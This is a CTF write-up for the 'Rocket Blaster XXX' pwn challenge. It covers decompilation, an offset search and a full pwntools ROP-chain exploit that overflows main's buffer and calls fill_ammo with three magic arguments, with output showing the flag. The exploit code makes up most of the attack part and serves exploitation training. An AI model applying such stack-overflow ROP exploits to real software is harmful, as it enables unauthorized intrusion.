# Rocket Blaster XXX

Information gathering

```
[*] '/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster/rocket_blaster_xxx'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
```

Full RELRO and NX are enabled (so no shellcode injection on the stack), but there is no stack canary and no PIE. Let's decompile the binary with Ghidra.

```
// main
undefined8 main(void)

{
  /* Four adjacent 8-byte locals: together they are the 32-byte stack buffer
     (local_28 .. local_10) that the read() below writes into. */
  undefined8 local_28;
  undefined8 local_20;
  undefined8 local_18;
  undefined8 local_10;
  
  banner();
  local_28 = 0;
  local_20 = 0;
  local_18 = 0;
  local_10 = 0;
  fflush(stdout);
  printf(
        "\nPrepare for trouble and make it double, or triple..\n\nYou need to place the ammo in the right place to load the Rocket Blaster XXX!\n\n>> "
        );
  fflush(stdout);
  /* Reads up to 102 bytes from stdin into a 32-byte buffer: a stack buffer
     overflow. With no canary (see checksec above) the saved return address
     is reachable; nothing in main() ever calls fill_ammo() itself. */
  read(0,&local_28,102);
  puts("\nPreparing beta testing..");
  return 0;
}
```

Potential BOF in read(): it accepts up to 102 bytes while the four qword locals only provide 32 bytes of stack space.

```
//fill_ammo
/* Prints ./flag.txt to stdout, but only when all three arguments carry the
   expected magic values; any mismatch exits with a distinct status (1/2/3).
   main() above never calls this function, so it is only reachable by
   redirecting control flow into it with the right rdi/rsi/rdx. */
void fill_ammo(long param_1,long param_2,long param_3)

{
  ssize_t sVar1;
  char local_d;
  int local_c;
  
  /* flags == 0 is O_RDONLY; the file is opened before the argument checks,
     so a missing flag file is reported even for a wrong call. */
  local_c = open("./flag.txt",0);
  if (local_c < 0) {
    perror("\nError opening flag.txt, please contact an Administrator.\n");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  /* First argument (rdi on amd64 SysV) must equal 0xdeadbeef. */
  if (param_1 != 0xdeadbeef) {
    printf("%s[x] [-] [-]\n\n%sPlacement 1: %sInvalid!\n\nAborting..\n",&DAT_00402010,&DAT_00402 008,
           &DAT_00402010);
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  /* Second argument (rsi) must equal 0xdeadbabe. */
  if (param_2 != 0xdeadbabe) {
    printf(&DAT_004020c0,&DAT_004020b6,&DAT_00402010,&DAT_00402008,&DAT_00402010);
                    /* WARNING: Subroutine does not return */
    exit(2);
  }
  /* Third argument (rdx) must equal 0xdead1337. */
  if (param_3 != 0xdead1337) {
    printf(&DAT_00402100,&DAT_004020b6,&DAT_00402010,&DAT_00402008,&DAT_00402010);
                    /* WARNING: Subroutine does not return */
    exit(3);
  }
  printf(&DAT_00402140,&DAT_004020b6);
  /* fflush() on an input stream is undefined by ISO C; glibc treats it as
     discarding any buffered, unread input. */
  fflush(stdin);
  fflush(stdout);
  /* Copy the flag file to stdout one byte at a time until EOF or error. */
  while( true ) {
    sVar1 = read(local_c,&local_d,1);
    if (sVar1 < 1) break;
    fputc((int)local_d,stdout);
  }
  close(local_c);
  fflush(stdin);
  fflush(stdout);
  return;
}

```

From this function the attack flow is clear: fill_ammo is never called from main, so we reach it ourselves with a basic ROP chain that sets up its three expected arguments.

Search for the offset to the saved return address

```
gef➤  pattern search $rsp
[+] Searching for '6661616161616161'/'6161616161616166' with period=8
[+] Found at offset 40 (little-endian search) likely
gef➤  
```

So this is my payload:

```python
#!/usr/bin/env python3

from pwn import *

exe = ELF("./rocket_blaster_xxx")  # target binary; no PIE, so symbol and gadget addresses are fixed
rop = ROP(exe)  # gadget finder over the binary's own code

context.binary = exe  # also sets arch/bits/endianness used by p64() and flat() below


def conn():
    """Return a tube to the target.

    With ``LOCAL`` on the command line a local process is started (and gdb is
    attached when ``DEBUG`` is also given); otherwise the remote service is used.
    """
    if not args.LOCAL:
        return remote("addr", 1337)

    tube = process([exe.path])
    if args.DEBUG:
        gdb.attach(tube)
    return tube

# Distance from the start of main()'s buffer to the saved return address,
# taken from the gef pattern search above.
offset = 40

# One "pop <reg>; ret" gadget per amd64 SysV argument register (rdi, rsi, rdx),
# found in the same order as before.
pop_rdi, pop_rsi, pop_rdx = (
    rop.find_gadget([f'pop {reg}', 'ret'])[0] for reg in ('rdi', 'rsi', 'rdx')
)
# Bare "ret" placed before the call; presumably for stack alignment — verify.
ret_gadget = rop.find_gadget(['ret'])[0]
def main():
    """Overflow main()'s buffer and return into fill_ammo() with its three magic arguments."""
    tube = conn()

    # Each argument is loaded into its register by a pop gadget; the extra ret
    # sits right before the call to fill_ammo.
    chain = [
        p64(pop_rdi), p64(0xdeadbeef),
        p64(pop_rsi), p64(0xdeadbabe),
        p64(pop_rdx), p64(0xdead1337),
        p64(ret_gadget),
        p64(exe.sym.fill_ammo),
    ]
    # NOTE(review): offset + 8 qwords is 104 bytes, while main() read()s at most
    # 102, so the top two bytes of the last qword are never written by us. It
    # worked in the run below; worth confirming rather than relying on it.
    payload = flat({offset: chain})

    tube.sendlineafter(b'>> ', payload)

    for label, addr in (('pop rdi', pop_rdi), ('pop rsi', pop_rsi), ('pop rdx', pop_rdx)):
        info(f'{label} -> {hex(addr)}')
    info(f'fill ammo address -> {hex(exe.sym.fill_ammo)}')

    tube.interactive()


if __name__ == "__main__":
    main()  # usage: python3 solve.py [LOCAL] [DEBUG]; no flag means remote

```

Result

```
m1kasha@Lanz:/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster$ python3 solve.py LOCAL
[*] '/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster/rocket_blaster_xxx'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 8 cached gadgets for './rocket_blaster_xxx'
[+] Starting local process '/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster/rocket_blaster_xxx': pid 2870    
[*] pop rdi -> 0x40159f
[*] pop rsi -> 0x40159d
[*] pop rdx -> 0x40159b
[*] fill ammo address -> 0x4012f5
[*] Switching to interactive mode

Preparing beta testing..
[✓] [✓] [✓]

All Placements are set correctly!

Ready to launch at: HTB{b00m_b00m_r0ck3t_2_th3_m00n}
[*] Got EOF while reading in interactive
$  
```
